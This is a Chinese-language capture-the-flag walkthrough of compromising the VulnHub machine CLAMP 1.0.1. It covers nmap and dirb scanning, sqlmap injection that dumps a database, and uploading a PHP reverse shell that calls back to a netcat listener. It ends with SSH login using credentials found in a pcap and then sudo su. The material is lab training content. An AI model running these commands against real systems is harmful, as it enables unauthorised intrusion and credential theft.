漏洞复现 -- CLAMP: 1.0.1

1、靶机地址

CLAMP: 1.0.1 ~ VulnHub

2、漏洞复现

sudo arp-scan -l

nmap -p- 192.168.159.164 --min-rate=5000

http://192.168.159.164

dirb http://192.168.159.164

http://192.168.159.164/nt4stopc

最终获得二进制：0110111001

拼接访问：
http://192.168.159.164/nt4stopc/0110111001

会跳转到
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/

点击Recommended Resorts右下角的新闻时，会跳转到
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1

sqlmap注入：
python3 sqlmap.py -u "http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --batch

python3 sqlmap.py -u "http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --batch -D tatil --dump

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf
解密
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

拼接访问：
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php

发现没有提交按钮，自己创建一个
<input name='up' type='submit'>

出现上传按钮，同时发现文件名以md5值命名

locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php     #IP修改为kali

echo -n "php-reverse-shell.php" | md5sum
2ad6bded962b884337eaeb921d7c2764

上传php-reverse-shell.php

kali开启监听
nc -lvvp 1234

http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

成功反弹shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /var/www/html
ls

http://192.168.159.164/important.pcapng
下载下来进行流量分析

email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work.

mklpc-osas112.

ssh mkelepce@192.168.159.164
mklpc-osas112.

sudo su